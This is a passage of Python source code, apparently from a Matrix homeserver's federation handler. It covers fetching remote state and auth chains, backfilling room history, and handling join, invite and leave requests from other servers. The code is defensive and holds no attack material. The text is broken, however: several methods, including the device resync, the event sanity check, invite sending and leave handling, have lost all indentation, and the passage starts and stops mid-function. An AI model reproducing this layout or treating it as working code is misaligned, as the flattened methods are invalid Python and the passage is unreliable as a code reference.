            event_map[e_id] for e_id in state_event_ids if e_id in event_map
        ]

        if include_event_in_state:
            remote_event = event_map.get(event_id)
            if not remote_event:
                raise Exception("Unable to get missing prev_event %s" % (event_id,))
            # Only include the event if it is itself (non-rejected) state.
            if remote_event.is_state() and remote_event.rejected_reason is None:
                remote_state.append(remote_event)

        auth_chain = [event_map[e_id] for e_id in auth_event_ids if e_id in event_map]
        auth_chain.sort(key=lambda e: e.depth)

        return remote_state, auth_chain
    async def _get_events_from_store_or_dest(
        self, destination: str, room_id: str, event_ids: Iterable[str]
    ) -> Dict[str, EventBase]:
        """Fetch events from a remote destination, checking if we already have them.

        Persists any events we don't already have as outliers.

        If we fail to fetch any of the events, a warning will be logged, and the event
        will be omitted from the result. Likewise, any events which turn out not to
        be in the given room.

        This function *does not* automatically get missing auth events of the
        newly fetched events. Callers must include the full auth chain of
        of the missing events in the `event_ids` argument, to ensure that any
        missing auth events are correctly fetched.

        Returns:
            map from event_id to event
        """
        fetched_events = await self.store.get_events(event_ids, allow_rejected=True)

        missing_events = set(event_ids) - fetched_events.keys()

        if missing_events:
            logger.debug(
                "Fetching unknown state/auth events %s for room %s",
                missing_events,
                room_id,
            )

            await self._get_events_and_persist(
                destination=destination, room_id=room_id, events=missing_events
            )

            # we need to make sure we re-load from the database to get the rejected
            # state correct.
            fetched_events.update(
                (await self.store.get_events(missing_events, allow_rejected=True))
            )

        # check for events which were in the wrong room.
        #
        # this can happen if a remote server claims that the state or
        # auth_events at an event in room A are actually events in room B
        bad_events = [
            (event_id, event.room_id)
            for event_id, event in fetched_events.items()
            if event.room_id != room_id
        ]

        for bad_event_id, bad_room_id in bad_events:
            # This is a bogus situation, but since we may only discover it a long time
            # after it happened, we try our best to carry on, by just omitting the
            # bad events from the returned auth/state set.
            logger.warning(
                "Remote server %s claims event %s in room %s is an auth/state "
                "event in room %s",
                destination,
                bad_event_id,
                bad_room_id,
                room_id,
            )

            del fetched_events[bad_event_id]

        return fetched_events
    async def _process_received_pdu(
        self, origin: str, event: EventBase, state: Optional[Iterable[EventBase]],
    ):
        """ Called when we have a new pdu. We need to do auth checks and put it
        through the StateHandler.

        Args:
            origin: server sending the event

            event: event to be persisted

            state: Normally None, but if we are handling a gap in the graph
                (ie, we are missing one or more prev_events), the resolved state at the
                event

        Raises:
            FederationError: if the event fails auth checks.
        """
        room_id = event.room_id
        event_id = event.event_id

        logger.debug("[%s %s] Processing event: %s", room_id, event_id, event)

        try:
            await self._handle_new_event(origin, event, state=state)
        except AuthError as e:
            raise FederationError("ERROR", e.code, e.msg, affected=event.event_id)

        # For encrypted messages we check that we know about the sending device,
        # if we don't then we mark the device cache for that user as stale.
        if event.type == EventTypes.Encrypted:
            device_id = event.content.get("device_id")
            sender_key = event.content.get("sender_key")

            cached_devices = await self.store.get_cached_devices_for_user(event.sender)

            resync = False  # Whether we should resync device lists.

            device = None
            if device_id is not None:
                device = cached_devices.get(device_id)
                if device is None:
                    logger.info(
                        "Received event from remote device not in our cache: %s %s",
                        event.sender,
                        device_id,
                    )
                    resync = True

            # We also check if the `sender_key` matches what we expect.
            if sender_key is not None:
                # Figure out what sender key we're expecting. If we know the
                # device and recognize the algorithm then we can work out the
                # exact key to expect. Otherwise check it matches any key we
                # have for that device.

                current_keys = []  # type: Container[str]

                if device:
                    keys = device.get("keys", {}).get("keys", {})

                    if (
                        event.content.get("algorithm")
                        == RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
                    ):
                        # For this algorithm we expect a curve25519 key.
                        key_name = "curve25519:%s" % (device_id,)
                        current_keys = [keys.get(key_name)]
                    else:
                        # We don't know understand the algorithm, so we just
                        # check it matches a key for the device.
                        current_keys = keys.values()
                elif device_id:
                    # We don't have any keys for the device ID.
                    pass
                else:
                    # The event didn't include a device ID, so we just look for
                    # keys across all devices.
                    current_keys = [
                        key
                        for device in cached_devices.values()
                        for key in device.get("keys", {}).get("keys", {}).values()
                    ]

                # We now check that the sender key matches (one of) the expected
                # keys.
                if sender_key not in current_keys:
                    logger.info(
                        "Received event from remote device with unexpected sender key: %s %s: %s",
                        event.sender,
                        device_id or "<no device_id>",
                        sender_key,
                    )
                    resync = True

            if resync:
                # Kick off the resync without blocking event processing.
                run_as_background_process(
                    "resync_device_due_to_pdu", self._resync_device, event.sender
                )
async def _resync_device(self, sender: str) -> None:
"""We have detected that the device list for the given user may be out
of sync, so we try and resync them.
"""
try:
await self.store.mark_remote_user_device_cache_as_stale(sender)
# Immediately attempt a resync in the background
if self.config.worker_app:
await self._user_device_resync(user_id=sender)
else:
await self._device_list_updater.user_device_resync(sender)
except Exception:
logger.exception("Failed to resync device for %s", sender)
    @log_function
    async def backfill(self, dest, room_id, limit, extremities):
        """ Trigger a backfill request to `dest` for the given `room_id`

        This will attempt to get more events from the remote. If the other side
        has no new events to offer, this will return an empty list.

        As the events are received, we check their signatures, and also do some
        sanity-checking on them. If any of the backfilled events are invalid,
        this method throws a SynapseError.

        Args:
            dest (str): server to backfill from; must not be ourselves.
            room_id (str): the room to fetch history for.
            limit (int): maximum number of events to request.
            extremities (list[str]): event IDs to paginate backwards from.

        Returns:
            list[EventBase]: the newly fetched events (excluding any we
            already had), after they have been persisted.

        TODO: make this more useful to distinguish failures of the remote
        server from invalid events (there is probably no point in trying to
        re-fetch invalid events from every other HS in the room.)
        """
        if dest == self.server_name:
            raise SynapseError(400, "Can't backfill from self.")
        events = await self.federation_client.backfill(
            dest, room_id, limit=limit, extremities=extremities
        )
        if not events:
            return []
        # ideally we'd sanity check the events here for excess prev_events etc,
        # but it's hard to reject events at this point without completely
        # breaking backfill in the same way that it is currently broken by
        # events whose signature we cannot verify (#3121).
        #
        # So for now we accept the events anyway. #3124 tracks this.
        #
        # for ev in events:
        #     self._sanity_check_event(ev)
        # Don't bother processing events we already have.
        seen_events = await self.store.have_events_in_timeline(
            {e.event_id for e in events}
        )
        events = [e for e in events if e.event_id not in seen_events]
        if not events:
            return []
        event_map = {e.event_id: e for e in events}
        event_ids = {e.event_id for e in events}
        # build a list of events whose prev_events weren't in the batch.
        # (XXX: this will include events whose prev_events we already have; that doesn't
        # sound right?)
        edges = [ev.event_id for ev in events if set(ev.prev_event_ids()) - event_ids]
        logger.info("backfill: Got %d events with %d edges", len(events), len(edges))
        # For each edge get the current state.
        auth_events = {}
        state_events = {}
        events_to_state = {}
        for e_id in edges:
            # Ask the remote for its view of the state (and auth events) at
            # each backwards extremity, so that the extremity events can be
            # persisted below with explicit state.
            state, auth = await self._get_state_for_room(
                destination=dest,
                room_id=room_id,
                event_id=e_id,
                include_event_in_state=False,
            )
            auth_events.update({a.event_id: a for a in auth})
            auth_events.update({s.event_id: s for s in state})
            state_events.update({s.event_id: s for s in state})
            events_to_state[e_id] = state
        # Every auth event ID referenced by the fetched events, their state,
        # or the auth events we already collected.
        required_auth = {
            a_id
            for event in events
            + list(state_events.values())
            + list(auth_events.values())
            for a_id in event.auth_event_ids()
        }
        # Some of the required auth events may be in the batch itself.
        auth_events.update(
            {e_id: event_map[e_id] for e_id in required_auth if e_id in event_map}
        )
        ev_infos = []
        # Step 1: persist the events in the chunk we fetched state for (i.e.
        # the backwards extremities), with custom auth events and state
        for e_id in events_to_state:
            # For paranoia we ensure that these events are marked as
            # non-outliers
            ev = event_map[e_id]
            assert not ev.internal_metadata.is_outlier()
            ev_infos.append(
                _NewEventInfo(
                    event=ev,
                    state=events_to_state[e_id],
                    auth_events={
                        (
                            auth_events[a_id].type,
                            auth_events[a_id].state_key,
                        ): auth_events[a_id]
                        for a_id in ev.auth_event_ids()
                        if a_id in auth_events
                    },
                )
            )
        if ev_infos:
            await self._handle_new_events(dest, room_id, ev_infos, backfilled=True)
        # Step 2: Persist the rest of the events in the chunk one by one
        events.sort(key=lambda e: e.depth)
        for event in events:
            # NOTE(review): `events_to_state` is keyed by event *ID*, but
            # `event` here is an EventBase, so this membership test looks like
            # it can never be True — should it be
            # `event.event_id in events_to_state`? Confirm before changing.
            if event in events_to_state:
                continue
            # For paranoia we ensure that these events are marked as
            # non-outliers
            assert not event.internal_metadata.is_outlier()
            # We store these one at a time since each event depends on the
            # previous to work out the state.
            # TODO: We can probably do something more clever here.
            await self._handle_new_event(dest, event, backfilled=True)
        return events
    async def maybe_backfill(
        self, room_id: str, current_depth: int, limit: int
    ) -> bool:
        """Checks the database to see if we should backfill before paginating,
        and if so do.

        Args:
            room_id
            current_depth: The depth from which we're paginating from. This is
                used to decide if we should backfill and what extremities to
                use.
            limit: The number of events that the pagination request will
                return. This is used as part of the heuristic to decide if we
                should back paginate.

        Returns:
            True if a backfill request to one of the candidate servers
            succeeded, False if we decided not to backfill or every candidate
            failed.
        """
        extremities = await self.store.get_oldest_events_with_depth_in_room(room_id)
        if not extremities:
            logger.debug("Not backfilling as no extremeties found.")
            return False
        # We only want to paginate if we can actually see the events we'll get,
        # as otherwise we'll just spend a lot of resources to get redacted
        # events.
        #
        # We do this by filtering all the backwards extremities and seeing if
        # any remain. Given we don't have the extremity events themselves, we
        # need to actually check the events that reference them.
        #
        # *Note*: the spec wants us to keep backfilling until we reach the start
        # of the room in case we are allowed to see some of the history. However
        # in practice that causes more issues than its worth, as a) its
        # relatively rare for there to be any visible history and b) even when
        # there is its often sufficiently long ago that clients would stop
        # attempting to paginate before backfill reached the visible history.
        #
        # TODO: If we do do a backfill then we should filter the backwards
        #   extremities to only include those that point to visible portions of
        #   history.
        #
        # TODO: Correctly handle the case where we are allowed to see the
        #   forward event but not the backward extremity, e.g. in the case of
        #   initial join of the server where we are allowed to see the join
        #   event but not anything before it. This would require looking at the
        #   state *before* the event, ignoring the special casing certain event
        #   types have.
        forward_events = await self.store.get_successor_events(list(extremities))
        extremities_events = await self.store.get_events(
            forward_events,
            redact_behaviour=EventRedactBehaviour.AS_IS,
            get_prev_content=False,
        )
        # We set `check_history_visibility_only` as we might otherwise get false
        # positives from users having been erased.
        filtered_extremities = await filter_events_for_server(
            self.storage,
            self.server_name,
            list(extremities_events.values()),
            redact=False,
            check_history_visibility_only=True,
        )
        if not filtered_extremities:
            return False
        # Check if we reached a point where we should start backfilling.
        sorted_extremeties_tuple = sorted(extremities.items(), key=lambda e: -int(e[1]))
        max_depth = sorted_extremeties_tuple[0][1]
        # If we're approaching an extremity we trigger a backfill, otherwise we
        # no-op.
        #
        # We chose twice the limit here as then clients paginating backwards
        # will send pagination requests that trigger backfill at least twice
        # using the most recent extremity before it gets removed (see below). We
        # chose more than one times the limit in case of failure, but choosing a
        # much larger factor will result in triggering a backfill request much
        # earlier than necessary.
        if current_depth - 2 * limit > max_depth:
            logger.debug(
                "Not backfilling as we don't need to. %d < %d - 2 * %d",
                max_depth,
                current_depth,
                limit,
            )
            return False
        logger.debug(
            "room_id: %s, backfill: current_depth: %s, max_depth: %s, extrems: %s",
            room_id,
            current_depth,
            max_depth,
            sorted_extremeties_tuple,
        )
        # We ignore extremities that have a greater depth than our current depth
        # as:
        #    1. we don't really care about getting events that have happened
        #       before our current position; and
        #    2. we have likely previously tried and failed to backfill from that
        #       extremity, so to avoid getting "stuck" requesting the same
        #       backfill repeatedly we drop those extremities.
        filtered_sorted_extremeties_tuple = [
            t for t in sorted_extremeties_tuple if int(t[1]) <= current_depth
        ]
        # However, we need to check that the filtered extremities are non-empty.
        # If they are empty then either we can a) bail or b) still attempt to
        # backill. We opt to try backfilling anyway just in case we do get
        # relevant events.
        if filtered_sorted_extremeties_tuple:
            sorted_extremeties_tuple = filtered_sorted_extremeties_tuple
        # We don't want to specify too many extremities as it causes the backfill
        # request URI to be too long.
        extremities = dict(sorted_extremeties_tuple[:5])
        # Now we need to decide which hosts to hit first.
        # First we try hosts that are already in the room
        # TODO: HEURISTIC ALERT.
        curr_state = await self.state_handler.get_current_state(room_id)

        def get_domains_from_state(state):
            """Get joined domains from state

            Args:
                state (dict[tuple, FrozenEvent]): State map from type/state
                    key to event.

            Returns:
                list[tuple[str, int]]: Returns a list of servers with the
                    lowest depth of their joins. Sorted by lowest depth first.
            """
            joined_users = [
                (state_key, int(event.depth))
                for (e_type, state_key), event in state.items()
                if e_type == EventTypes.Member and event.membership == Membership.JOIN
            ]
            joined_domains = {}  # type: Dict[str, int]
            for u, d in joined_users:
                try:
                    dom = get_domain_from_id(u)
                    old_d = joined_domains.get(dom)
                    if old_d:
                        joined_domains[dom] = min(d, old_d)
                    else:
                        joined_domains[dom] = d
                except Exception:
                    # malformed user IDs are simply skipped
                    pass
            return sorted(joined_domains.items(), key=lambda d: d[1])

        curr_domains = get_domains_from_state(curr_state)
        likely_domains = [
            domain for domain, depth in curr_domains if domain != self.server_name
        ]

        async def try_backfill(domains):
            # Try each candidate domain in turn until one backfill succeeds;
            # returns True on the first success, False if all fail.
            # TODO: Should we try multiple of these at a time?
            for dom in domains:
                try:
                    await self.backfill(
                        dom, room_id, limit=100, extremities=extremities
                    )
                    # If this succeeded then we probably already have the
                    # appropriate stuff.
                    # TODO: We can probably do something more intelligent here.
                    return True
                except SynapseError as e:
                    logger.info("Failed to backfill from %s because %s", dom, e)
                    continue
                except HttpResponseException as e:
                    if 400 <= e.code < 500:
                        # 4xx responses are our fault; surface them.
                        raise e.to_synapse_error()
                    logger.info("Failed to backfill from %s because %s", dom, e)
                    continue
                except CodeMessageException as e:
                    if 400 <= e.code < 500:
                        raise
                    logger.info("Failed to backfill from %s because %s", dom, e)
                    continue
                except NotRetryingDestination as e:
                    logger.info(str(e))
                    continue
                except RequestSendFailed as e:
                    logger.info("Failed to get backfill from %s because %s", dom, e)
                    continue
                except FederationDeniedError as e:
                    logger.info(e)
                    continue
                except Exception as e:
                    logger.exception("Failed to backfill from %s because %s", dom, e)
                    continue
            return False

        success = await try_backfill(likely_domains)
        if success:
            return True
        # Huh, well *those* domains didn't work out. Lets try some domains
        # from the time.
        tried_domains = set(likely_domains)
        tried_domains.add(self.server_name)
        event_ids = list(extremities.keys())
        logger.debug("calling resolve_state_groups in _maybe_backfill")
        resolve = preserve_fn(self.state_handler.resolve_state_groups_for_events)
        states = await make_deferred_yieldable(
            defer.gatherResults(
                [resolve(room_id, [e]) for e in event_ids], consumeErrors=True
            )
        )
        # dict[str, dict[tuple, str]], a map from event_id to state map of
        # event_ids.
        states = dict(zip(event_ids, [s.state for s in states]))
        state_map = await self.store.get_events(
            [e_id for ids in states.values() for e_id in ids.values()],
            get_prev_content=False,
        )
        # Replace event IDs with the events themselves, dropping any we
        # failed to fetch.
        states = {
            key: {
                k: state_map[e_id]
                for k, e_id in state_dict.items()
                if e_id in state_map
            }
            for key, state_dict in states.items()
        }
        # Try the domains joined at each extremity's state, skipping domains
        # we already tried above.
        for e_id, _ in sorted_extremeties_tuple:
            likely_domains = get_domains_from_state(states[e_id])
            success = await try_backfill(
                [dom for dom, _ in likely_domains if dom not in tried_domains]
            )
            if success:
                return True
            tried_domains.update(dom for dom, _ in likely_domains)
        return False
    async def _get_events_and_persist(
        self, destination: str, room_id: str, events: Iterable[str]
    ):
        """Fetch the given events from a server, and persist them as outliers.

        This function *does not* recursively get missing auth events of the
        newly fetched events. Callers must include in the `events` argument
        any missing events from the auth chain.

        Logs a warning if we can't find the given event.

        Args:
            destination: the server to fetch the events from.
            room_id: the room the events belong to.
            events: the IDs of the events to fetch.
        """
        room_version = await self.store.get_room_version(room_id)
        event_map = {}  # type: Dict[str, EventBase]

        async def get_event(event_id: str):
            # Fetch a single event as an outlier. Failures are logged and
            # swallowed so that one bad event doesn't abort the whole batch.
            with nested_logging_context(event_id):
                try:
                    event = await self.federation_client.get_pdu(
                        [destination], event_id, room_version, outlier=True,
                    )
                    if event is None:
                        logger.warning(
                            "Server %s didn't return event %s", destination, event_id,
                        )
                        return
                    event_map[event.event_id] = event
                except Exception as e:
                    logger.warning(
                        "Error fetching missing state/auth event %s: %s %s",
                        event_id,
                        type(e),
                        e,
                    )

        # Fetch with limited concurrency (5 at a time).
        await concurrently_execute(get_event, events, 5)
        # Make a map of auth events for each event. We do this after fetching
        # all the events as some of the events' auth events will be in the list
        # of requested events.
        auth_events = [
            aid
            for event in event_map.values()
            for aid in event.auth_event_ids()
            if aid not in event_map
        ]
        persisted_events = await self.store.get_events(
            auth_events, allow_rejected=True,
        )
        event_infos = []
        for event in event_map.values():
            auth = {}
            for auth_event_id in event.auth_event_ids():
                # Prefer the already-persisted copy; fall back to the batch.
                ae = persisted_events.get(auth_event_id) or event_map.get(auth_event_id)
                if ae:
                    auth[(ae.type, ae.state_key)] = ae
                else:
                    logger.info("Missing auth event %s", auth_event_id)
            event_infos.append(_NewEventInfo(event, None, auth))
        await self._handle_new_events(
            destination, room_id, event_infos,
        )
def _sanity_check_event(self, ev):
"""
Do some early sanity checks of a received event
In particular, checks it doesn't have an excessive number of
prev_events or auth_events, which could cause a huge state resolution
or cascade of event fetches.
Args:
ev (synapse.events.EventBase): event to be checked
Returns: None
Raises:
SynapseError if the event does not pass muster
"""
if len(ev.prev_event_ids()) > 20:
logger.warning(
"Rejecting event %s which has %i prev_events",
ev.event_id,
len(ev.prev_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(ev.auth_event_ids()) > 10:
logger.warning(
"Rejecting event %s which has %i auth_events",
ev.event_id,
len(ev.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def send_invite(self, target_host, event):
""" Sends the invite to the remote server for signing.
Invites must be signed by the invitee's server before distribution.
"""
pdu = await self.federation_client.send_invite(
destination=target_host,
room_id=event.room_id,
event_id=event.event_id,
pdu=event,
)
return pdu
async def on_event_auth(self, event_id: str) -> List[EventBase]:
event = await self.store.get_event(event_id)
auth = await self.store.get_auth_chain(
list(event.auth_event_ids()), include_given=True
)
return list(auth)
    async def do_invite_join(
        self, target_hosts: Iterable[str], room_id: str, joinee: str, content: JsonDict
    ) -> Tuple[str, int]:
        """ Attempts to join the `joinee` to the room `room_id` via the
        servers contained in `target_hosts`.

        This first triggers a /make_join/ request that returns a partial
        event that we can fill out and sign. This is then sent to the
        remote server via /send_join/ which responds with the state at that
        event and the auth_chains.

        We suspend processing of any received events from this room until we
        have finished processing the join.

        Args:
            target_hosts: List of servers to attempt to join the room with.
            room_id: The ID of the room to join.
            joinee: The User ID of the joining user.
            content: The event content to use for the join event.

        Returns:
            A tuple of (event ID of the join event, the stream ID returned
            when persisting the auth tree).
        """
        # TODO: We should be able to call this on workers, but the upgrading of
        # room stuff after join currently doesn't work on workers.
        assert self.config.worker.worker_app is None
        logger.debug("Joining %s to %s", joinee, room_id)
        origin, event, room_version_obj = await self._make_and_verify_event(
            target_hosts,
            room_id,
            joinee,
            "join",
            content,
            # needed to make the remote aware of the room versions we support
            params={"ver": KNOWN_ROOM_VERSIONS},
        )
        # This shouldn't happen, because the RoomMemberHandler has a
        # linearizer lock which only allows one operation per user per room
        # at a time - so this is just paranoia.
        assert room_id not in self.room_queues
        # Start queueing incoming PDUs for this room until the join completes.
        self.room_queues[room_id] = []
        await self._clean_room_for_join(room_id)
        handled_events = set()
        try:
            # Try the host we successfully got a response to /make_join/
            # request first.
            host_list = list(target_hosts)
            try:
                host_list.remove(origin)
                host_list.insert(0, origin)
            except ValueError:
                pass
            ret = await self.federation_client.send_join(
                host_list, event, room_version_obj
            )
            origin = ret["origin"]
            state = ret["state"]
            auth_chain = ret["auth_chain"]
            auth_chain.sort(key=lambda e: e.depth)
            handled_events.update([s.event_id for s in state])
            handled_events.update([a.event_id for a in auth_chain])
            handled_events.add(event.event_id)
            logger.debug("do_invite_join auth_chain: %s", auth_chain)
            logger.debug("do_invite_join state: %s", state)
            logger.debug("do_invite_join event: %s", event)
            # if this is the first time we've joined this room, it's time to add
            # a row to `rooms` with the correct room version. If there's already a
            # row there, we should override it, since it may have been populated
            # based on an invite request which lied about the room version.
            #
            # federation_client.send_join has already checked that the room
            # version in the received create event is the same as room_version_obj,
            # so we can rely on it now.
            #
            await self.store.upsert_room_on_join(
                room_id=room_id, room_version=room_version_obj,
            )
            max_stream_id = await self._persist_auth_tree(
                origin, room_id, auth_chain, state, event, room_version_obj
            )
            # We wait here until this instance has seen the events come down
            # replication (if we're using replication) as the below uses caches.
            await self._replication.wait_for_stream_position(
                self.config.worker.events_shard_config.get_instance(room_id),
                "events",
                max_stream_id,
            )
            # Check whether this room is the result of an upgrade of a room we already know
            # about. If so, migrate over user information
            predecessor = await self.store.get_room_predecessor(room_id)
            if not predecessor or not isinstance(predecessor.get("room_id"), str):
                return event.event_id, max_stream_id
            old_room_id = predecessor["room_id"]
            logger.debug(
                "Found predecessor for %s during remote join: %s", room_id, old_room_id
            )
            # We retrieve the room member handler here as to not cause a cyclic dependency
            member_handler = self.hs.get_room_member_handler()
            await member_handler.transfer_room_state_on_room_upgrade(
                old_room_id, room_id
            )
            logger.debug("Finished joining %s to %s", joinee, room_id)
            return event.event_id, max_stream_id
        finally:
            # Whether the join succeeded or not, stop queueing PDUs for this
            # room and kick off processing of whatever got queued.
            room_queue = self.room_queues[room_id]
            del self.room_queues[room_id]
            # we don't need to wait for the queued events to be processed -
            # it's just a best-effort thing at this point. We do want to do
            # them roughly in order, though, otherwise we'll end up making
            # lots of requests for missing prev_events which we do actually
            # have. Hence we fire off the background task, but don't wait for it.
            run_in_background(self._handle_queued_pdus, room_queue)
async def _handle_queued_pdus(self, room_queue):
"""Process PDUs which got queued up while we were busy send_joining.
Args:
room_queue (list[FrozenEvent, str]): list of PDUs to be processed
and the servers that sent them
"""
for p, origin in room_queue:
try:
logger.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(origin, p, sent_to_us_directly=True)
except Exception as e:
logger.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, origin, e
)
    async def on_make_join_request(
        self, origin: str, room_id: str, user_id: str
    ) -> EventBase:
        """ We've received a /make_join/ request, so we create a partial
        join event for the room and return that. We do *not* persist or
        process it until the other server has signed it and sent it back.

        Args:
            origin: The (verified) server name of the requesting server.
            room_id: Room to create join event in
            user_id: The user to create the join for

        Returns:
            The partial (not yet signed by the remote) join event.

        Raises:
            SynapseError: (403) if `user_id` does not belong to `origin`.
            NotFoundError: if we are no longer in the room.
        """
        if get_domain_from_id(user_id) != origin:
            logger.info(
                "Got /make_join request for user %r from different origin %s, ignoring",
                user_id,
                origin,
            )
            raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
        # checking the room version will check that we've actually heard of the room
        # (and return a 404 otherwise)
        room_version = await self.store.get_room_version_id(room_id)
        # now check that we are *still* in the room
        is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
        if not is_in_room:
            logger.info(
                "Got /make_join request for room %s we are no longer in", room_id,
            )
            raise NotFoundError("Not an active room on this server")
        event_content = {"membership": Membership.JOIN}
        builder = self.event_builder_factory.new(
            room_version,
            {
                "type": EventTypes.Member,
                "content": event_content,
                "room_id": room_id,
                "sender": user_id,
                "state_key": user_id,
            },
        )
        try:
            event, context = await self.event_creation_handler.create_new_client_event(
                builder=builder
            )
        except SynapseError as e:
            logger.warning("Failed to create join to %s because %s", room_id, e)
            raise
        # The remote hasn't signed it yet, obviously. We'll do the full checks
        # when we get the event back in `on_send_join_request`
        await self.auth.check_from_context(
            room_version, event, context, do_sig_check=False
        )
        return event
    async def on_send_join_request(self, origin, pdu):
        """ We have received a join event for a room. Fully process it and
        respond with the current state and auth chains.

        Args:
            origin (str): the server the event came from; the event's sender
                must belong to this server.
            pdu (EventBase): the signed join event.

        Returns:
            dict with keys "state" (the state events before the join) and
            "auth_chain" (the auth chain for that state).

        Raises:
            SynapseError: (403) if the event's sender is not from `origin`.
        """
        event = pdu
        logger.debug(
            "on_send_join_request from %s: Got event: %s, signatures: %s",
            origin,
            event.event_id,
            event.signatures,
        )
        if get_domain_from_id(event.sender) != origin:
            logger.info(
                "Got /send_join request for user %r from different origin %s",
                event.sender,
                origin,
            )
            raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
        # This is a real event, not an outlier.
        event.internal_metadata.outlier = False
        # Send this event on behalf of the origin server.
        #
        # The reasons we have the destination server rather than the origin
        # server send it are slightly mysterious: the origin server should have
        # all the necessary state once it gets the response to the send_join,
        # so it could send the event itself if it wanted to. It may be that
        # doing it this way reduces failure modes, or avoids certain attacks
        # where a new server selectively tells a subset of the federation that
        # it has joined.
        #
        # The fact is that, as of the current writing, Synapse doesn't send out
        # the join event over federation after joining, and changing it now
        # would introduce the danger of backwards-compatibility problems.
        event.internal_metadata.send_on_behalf_of = origin
        context = await self._handle_new_event(origin, event)
        logger.debug(
            "on_send_join_request: After _handle_new_event: %s, sigs: %s",
            event.event_id,
            event.signatures,
        )
        # Return the state (and its auth chain) as it was *before* the join.
        prev_state_ids = await context.get_prev_state_ids()
        state_ids = list(prev_state_ids.values())
        auth_chain = await self.store.get_auth_chain(state_ids)
        state = await self.store.get_events(list(prev_state_ids.values()))
        return {"state": list(state.values()), "auth_chain": auth_chain}
    async def on_invite_request(
        self, origin: str, event: EventBase, room_version: RoomVersion
    ):
        """ We've got an invite event. Process and persist it. Sign it.

        Respond with the now signed event.

        Args:
            origin: The (verified) server name the invite came from.
            event: The invite event.
            room_version: The room version (used when signing and when
                recording the room).

        Returns:
            The invite event with our signature added.

        Raises:
            SynapseError: if any of the validation/permission checks fail.
        """
        # NB: the order of these checks determines which error a bad request
        # surfaces first; keep it stable.
        if event.state_key is None:
            raise SynapseError(400, "The invite event did not have a state key")
        is_blocked = await self.store.is_room_blocked(event.room_id)
        if is_blocked:
            raise SynapseError(403, "This room has been blocked on this server")
        if self.hs.config.block_non_admin_invites:
            raise SynapseError(403, "This server does not accept room invites")
        if not self.spam_checker.user_may_invite(
            event.sender, event.state_key, event.room_id
        ):
            raise SynapseError(
                403, "This user is not permitted to send invites to this server/user"
            )
        membership = event.content.get("membership")
        if event.type != EventTypes.Member or membership != Membership.INVITE:
            raise SynapseError(400, "The event was not an m.room.member invite event")
        sender_domain = get_domain_from_id(event.sender)
        if sender_domain != origin:
            raise SynapseError(
                400, "The invite event was not from the server sending it"
            )
        if not self.is_mine_id(event.state_key):
            raise SynapseError(400, "The invite event must be for this server")
        # block any attempts to invite the server notices mxid
        if event.state_key == self._server_notices_mxid:
            raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
        # keep a record of the room version, if we don't yet know it.
        # (this may get overwritten if we later get a different room version in a
        # join dance).
        await self._maybe_store_room_on_outlier_membership(
            room_id=event.room_id, room_version=room_version
        )
        # We have no state for the room, so persist the invite as an
        # out-of-band-membership outlier.
        event.internal_metadata.outlier = True
        event.internal_metadata.out_of_band_membership = True
        event.signatures.update(
            compute_event_signature(
                room_version,
                event.get_pdu_json(),
                self.hs.hostname,
                self.hs.signing_key,
            )
        )
        context = await self.state_handler.compute_event_context(event)
        await self.persist_events_and_notify(event.room_id, [(event, context)])
        return event
async def do_remotely_reject_invite(
self, target_hosts: Iterable[str], room_id: str, user_id: str, content: JsonDict
) -> Tuple[EventBase, int]:
origin, event, room_version = await self._make_and_verify_event(
target_hosts, room_id, user_id, "leave", content=content
)
# Mark as outlier as we don't have any state for this event; we're not
# even in the room.
event.internal_metadata.outlier = True
event.internal_metadata.out_of_band_membership = True
# Try the host that we successfully called /make_leave/ on first for
# the /send_leave/ request.
host_list = list(target_hosts)
try:
host_list.remove(origin)
host_list.insert(0, origin)
except ValueError:
pass
await self.federation_client.send_leave(host_list, event)
context = await self.state_handler.compute_event_context(event)
stream_id = await self.persist_events_and_notify(
event.room_id, [(event, context)]
)
return event, stream_id
async def _make_and_verify_event(
self,
target_hosts: Iterable[str],
room_id: str,
user_id: str,
membership: str,
content: JsonDict = {},
params: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
origin,
event,
room_version,
) = await self.federation_client.make_membership_event(
target_hosts, room_id, user_id, membership, content, params=params
)
logger.debug("Got response to make_%s: %s", membership, event)
# We should assert some things.
# FIXME: Do this in a nicer way
assert event.type == EventTypes.Member
assert event.user_id == user_id
assert event.state_key == user_id
assert event.room_id == room_id
return origin, event, room_version
    async def on_make_leave_request(
        self, origin: str, room_id: str, user_id: str
    ) -> EventBase:
        """ We've received a /make_leave/ request, so we create a partial
        leave event for the room and return that. We do *not* persist or
        process it until the other server has signed it and sent it back.

        Args:
            origin: The (verified) server name of the requesting server.
            room_id: Room to create leave event in
            user_id: The user to create the leave for

        Returns:
            The partial (not yet signed by the remote) leave event.

        Raises:
            SynapseError: (403) if `user_id` does not belong to `origin`.
            AuthError: if the leave event fails the (signature-less) auth
                checks.
        """
        if get_domain_from_id(user_id) != origin:
            logger.info(
                "Got /make_leave request for user %r from different origin %s, ignoring",
                user_id,
                origin,
            )
            raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
        room_version = await self.store.get_room_version_id(room_id)
        builder = self.event_builder_factory.new(
            room_version,
            {
                "type": EventTypes.Member,
                "content": {"membership": Membership.LEAVE},
                "room_id": room_id,
                "sender": user_id,
                "state_key": user_id,
            },
        )
        event, context = await self.event_creation_handler.create_new_client_event(
            builder=builder
        )
        try:
            # The remote hasn't signed it yet, obviously. We'll do the full checks
            # when we get the event back in `on_send_leave_request`
            await self.auth.check_from_context(
                room_version, event, context, do_sig_check=False
            )
        except AuthError as e:
            logger.warning("Failed to create new leave %r because %s", event, e)
            raise e
        return event
async def on_send_leave_request(self, origin, pdu):
""" We have received a leave event for a room. Fully process it."""
event = pdu
logger.debug(
"on_send_leave_request: Got event: %s, signatures: %s",
event.event_id,
event.signatures,
)
if get_domain_from_id(event.sender) != origin:
logger.info(
"Got /send_leave request for user %r from different origin %s",
event.sender,
origin,
)
